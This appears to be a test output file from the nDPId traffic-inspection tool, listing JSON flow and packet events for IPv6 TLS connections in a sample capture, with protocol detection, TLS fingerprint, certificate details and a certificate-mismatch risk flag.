00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1448269127960,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":260,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":260,"pkt_l4_len":206,"thread_ts_msec":1448269127960,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAM4RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAABf12kBuwDOCoAMj5N114hr41MJBd7sKG9JfODv2KzX0uexKi4OUzkr936AyksmjfKzejWhR1IllABVz6\/Nd8+DDPRvVbNJa4sAljMB\/byd9EnDrnASdvNnincHpyqVPP90d4TSxj+ARZa\/L622T2LNfPxOM6m\/si1ZmPjMCf2wR7DzkfTBciJe2oZugnMhbWbTFVoln8LtSZhpET4oRj3Jk\/IY0Vhm0AHAVNXjHBEt89UVS7Gr6h9OBH5HRJ1TIdTk4GJ40SQl9lgo1l4eCx0="}
00578{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1448269128003,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":143,"pkt_l4_len":89,"thread_ts_msec":1448269128003,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAAFkRMyoAFFBACwwCAAAAAAAAAF8qAA1AAAEAA3qswP\/+pw1MAbvXaQBZLuIAB1nnejc74Zg5YssedTReRP0KRIf1hcs3Aafoe+Tuwy6JT\/77UOdg9PcT9s8XDyyGEBG\/Mph8KZAg9aAfxnp6BrSLMfMbzThg3fGY8Pw0dHA="}
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1448269128028,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":99,"pkt_l4_len":45,"thread_ts_msec":1448269128028,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAAC0RQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAABf12kBuwAtCd8Mj5N114hr41MKZOnBWgR9A+MJ4bypcpF9U29vj07q+fvNp9EO"}
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXIAAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="}
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU0AAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="}
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSbiqmXmyY1W1zoBJvkBOIAAACBAWgBAIICgBerOcSDXcnAQMDCA=="}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXMqpl5tgBAA4WsSAAABAQgKEg13LQBerOc="}
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuScEOqziew8Z1OoBJvkELPAAACBAWgBAIICgBerOcSDXcnAQMDCA=="}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU5Dqs4ogBAA4WsSAAABAQgKEg13LQBerOc="}
00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139219,"flow_last_seen":1448269139219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269139219,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1448269139219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139219,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9NoAAAAAoAJwgGsaAAACBAWgBAIIChINd8gAAAAAAQMDBw=="}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139239,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSdnTlL8YOHPTboBJvkPn2AAACBAWgBAIICgBerYcSDXfIAQMDCA=="}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139239,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9Nt05S\/HgBAA4WsSAAABAQgKEg13zQBerYc="}
00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139314,"flow_last_seen":1448269139314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269139314,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1448269139314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139314,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BoQAAAAAAAA7t6twBuwxnksLpg7gmgBABC+E3AAABAQgKEg134BvnLVo="}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139321,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOyoCJvAArQGhAAAAAAAADu0qAA1AAAEAA3qswP\/+pw1MAbvq3OmDuCYMZ5LDgBAD0zk\/AAABAQgKG+fdWhINH94="}
00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269143410,"flow_last_seen":1448269143410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269143410,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1448269143410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143410,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAyiAEBA\/IPrOsAwAACXenXQBu97bCAR6JAzggBADIfF3AAABAQgKEg174HFvpAM="}
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1448269143539,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143539,"pkt":"eKzApw1M9LUv\/K\/Cht1gwAAAACAGKyoDKIAQED8g+s6wDAAAJd4qAA1AAAEAA3qswP\/+pw1MAbuddHokDODe2wgFgBAAa0\/sAAABAQgKcXBUrRINT9U="}
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144306,"flow_last_seen":1448269144306,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269144306,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1448269144306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144306,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAACagSYBu7SkSa3RTHVvgBABRwoCAAABAQgKEg18wD9sNbI="}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1448269144348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144348,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGNSoAFFBACwwCAAAAAAAAAJoqAA1AAAEAA3qswP\/+pw1MAbuBJtFMdW+0pEmugBABd0eeAAABAQgKP2zlshINJLA="}
00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144450,"flow_last_seen":1448269144450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269144450,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1448269144450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144450,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhUAAAAAoAJwgGsaAAACBAWgBAIIChINfOQAAAAAAQMDBw=="}
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144475,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSgnjE+S8HnzYWoBJvkOerAAACBAWgBAIICgBesqQSDXzkAQMDCA=="}
